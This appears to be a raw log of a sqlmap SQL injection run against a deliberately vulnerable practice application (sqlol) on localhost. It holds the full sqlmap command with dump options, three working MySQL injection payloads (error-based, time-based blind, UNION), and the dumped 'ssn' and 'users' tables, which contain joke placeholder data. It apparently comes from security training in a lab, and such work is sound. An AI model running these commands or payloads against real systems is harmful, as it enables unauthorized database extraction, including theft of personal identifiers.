=================================================================================
sqlmap -u 
"http://localhost/MCIR/sqlol/select.php?sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=one_row&error_level=verbose&inject_string=test&location=where_string&submit=Inject%21" -p inject_string --dump --risk=1 --level=1

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for MySQL extending provided level (1) and risk (1) values? [Y/n] n
GET parameter 'inject_string' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
=================================================================================
sqlmap identified the following injection point(s) with a total of 41 HTTP(s) requests:
---
Parameter: inject_string (GET)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=one_row&error_level=verbose&inject_string=test' AND EXTRACTVALUE(2700,CONCAT(0x5c,0x71717a7671,(SELECT (ELT(2700=2700,1))),0x7178717171)) AND 'YMRv'='YMRv&location=where_string&submit=Inject!

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=one_row&error_level=verbose&inject_string=test' AND (SELECT 9334 FROM (SELECT(SLEEP(5)))SSPf) AND 'YSCw'='YSCw&location=where_string&submit=Inject!

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=one_row&error_level=verbose&inject_string=test' UNION ALL SELECT CONCAT(0x71717a7671,0x47615949476d785866544a4b4c594d665379706f675a4d41666a756f4863764c6e666376664e7470,0x7178717171)-- -&location=where_string&submit=Inject!
---
web application technology: PHP 5.6.40, Apache 2.4.38
back-end DBMS: MySQL >= 5.1
Database: sqlol
Table: ssn
[5 entries]
+-------------+-----------------------+
| ssn         | name                  |
+-------------+-----------------------+
| 000-00-1112 | Wengdack Slobdegoob   |
| 012-34-5678 | Herp Derper           |
| 111-22-3333 | Peter Weiner          |
| 666-67-6776 | Chunk MacRunfast      |
| 999-99-9999 | SlapdeBack LovedeFace |
+-------------+-----------------------+

Database: sqlol
Table: users
[5 entries]
+----+---------+-----------------------+
| id | isadmin | username              |
+----+---------+-----------------------+
| 1  | 1       | Herp Derper           |
| 2  | 1       | SlapdeBack LovedeFace |
| 3  | 0       | Wengdack Slobdegoob   |
| 4  | 0       | Chunk MacRunfast      |
| 5  | 0       | Peter Weiner          |
+----+---------+-----------------------+

